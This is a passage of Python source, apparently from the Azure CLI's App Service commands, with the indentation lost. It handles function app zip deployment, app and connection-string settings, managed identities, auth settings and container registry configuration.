if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except DefaultErrorResponseException as ex:
if ex.response.status_code != 200:
raise ex
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise CLIError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise CLIError('Could not determine the current plan of the functionapp')
if not (is_plan_consumption(cmd, src_plan_info) or is_plan_elastic_premium(cmd, src_plan_info)):
raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg)
if not (is_plan_consumption(cmd, dest_plan_instance) or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
# API Version 2019-08-01 (latest as of writing this code) does not return slot instances, however 2018-02-01 does
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot,
api_version="2018-02-01")
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
